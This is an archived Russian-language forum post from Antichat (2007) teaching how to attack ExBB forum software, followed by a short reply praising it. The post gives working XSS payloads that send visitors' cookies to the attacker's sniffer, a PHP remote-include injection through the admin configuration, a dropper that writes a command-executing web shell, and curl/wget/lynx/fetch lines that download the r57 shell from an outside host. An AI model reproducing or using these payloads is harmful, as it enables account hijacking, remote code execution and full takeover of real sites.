ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Exbb Анализ уязвимостей
  #1  
Старый 05.01.2007, 01:31
N0n$e№Z
Новичок
Регистрация: 27.11.2006
Сообщений: 17
Провел на форуме:
113057

Репутация: 13
По умолчанию Exbb Анализ уязвимостей

И так в этой статье я расскажу как использовать уязвимости в форумах ExBB

XSS:

Код:
[+email]'style='display:none;background:url(javascript:document.images[2].src="http://Ваш сниффер?"+document.cookie)[/email]
[+url="]"style='background:url(javascript:document. images[0].src="http://Ваш сниффер?"+document.cookie)'[/url]
Перед использованием удалить из строчек +

Это XSS уязвимости с помощью которых вы добудите Cookie,а уже с их помощью сможете узнать пароль админа!
Далее при заходе на страницу с этим постом вам на сниффер будут отправлены Cookie того или иного пользователя!Среди них может быть и админ!
Способ применения: Данные "Коды" нужно вставить в тело сообщения(Поста)! Для проверки их работоспособности можно нажать "Предварительный просмотр"!

Exploit's :

http://www.milw0rm.com/exploits/1713
http://www.milw0rm.com/exploits/1686


PHP-инклюдинг - (Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.)

Для того чтобы воспользоваться данной уязвимостью надо иметь доступ в Админ центр!

Зашли мы в админку:
1.Выбираем из столбца меню "Конфигурация".
2.Находим строчку URL вашей конференции
3.Там будет что-то вроде http://site/exbb/
4.Добавим в конец строчки '.@include('http://site/hackexbb.txt').'
5.Все
Объясню...
'.@include('http://здесь сайт на котором лежит файл >>>>hackexbb.txt').'

hackexbb.txt (Должен иметь содержимое со скриптом)

PHP код:
<?
$fp
=fopen("im/avatars/personal/shell.php""w");
fputs($fp,"<?
system(\$_GET['c']);
?>"
);
fclose($fp);
?>
Этот скрипт зальет в директорию im/avatars/personal/ простенькие шелл (shell.php) с помощью которого мы загрузим полноценный шелл!

Далее...

Все это примет вид - http://site/exbb/im/avatars/personal/shell.php

Чтобы воспользоваться коммандами делаем так в конец shell.php добавляем ?c=команда Т.Е. http://site/exbb/im/avatars/personal/shell.php?c=ls

Теперь о командах:
ls - просмотр файлов в данной директоии
pwd - просмотр пути до шелла.
uname - a - Имя ОС

Для заливки файлом используем команды:

curl --output im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

wget -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

get http://vrms.narod.ru/r57shell.php > /r57shell.php

links -source "http://vrms.narod.ru/r57shell.php" > im/avatars/personal/r57shell.php

lynx -source http://vrms.narod.ru/r57shell.php > im/avatars/personal/r57shell.php

fetch -o im/avatars/personal/r57shell.php http://vrms.narod.ru/r57shell.php

И дальше r57 поможет вам во всем!!

Удачи!Данная статья не является пособием по взлому)))
 

  #2  
Старый 05.01.2007, 09:10
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Статья неплохая по моему, вот только имхо надо перенести в статьи, а не уязвимости))
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ